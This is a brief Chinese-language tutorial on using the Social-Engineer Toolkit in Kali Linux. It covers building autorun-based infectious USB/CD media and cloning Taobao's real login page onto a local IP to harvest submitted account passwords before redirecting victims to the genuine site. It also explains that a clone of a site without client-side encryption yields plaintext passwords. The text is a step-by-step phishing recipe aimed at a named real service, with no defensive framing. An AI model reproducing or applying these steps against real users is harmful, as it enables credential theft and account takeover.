1.USB/CD/DVD攻击
root@kali:~# setoolkit
set> 1
set> 3
autorun.inf文件,允许在双击磁盘时自动运行指定的某个文件。
2.站点克隆
root@kali:~# setoolkit
set> 依次输入1,2,3,2
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.182
set:webattack> Enter the url to clone:https://login.taobao.com/member/login.jhtml
设置完成后,访问192.168.1.182,相当于访问淘宝的登录页面。
第一次输入账户密码后,会自动跳转到真实的淘宝登录页面。
由于淘宝会对用户输入的密码进行加密,所以我们看到的是加密后的密码信息。
密文
如果我们克隆的站点,未对用户的输入进行加密,将会看到明文密码。
明文
注意:使用setoolkit时,会自动在当前运行的目录下生成.set目录。每做完一次操作,可以删除下该目录,否则可能会遇到一些奇怪的错误。
root@kali:~# pwd
/root
root@kali:~# rm -rf .set/
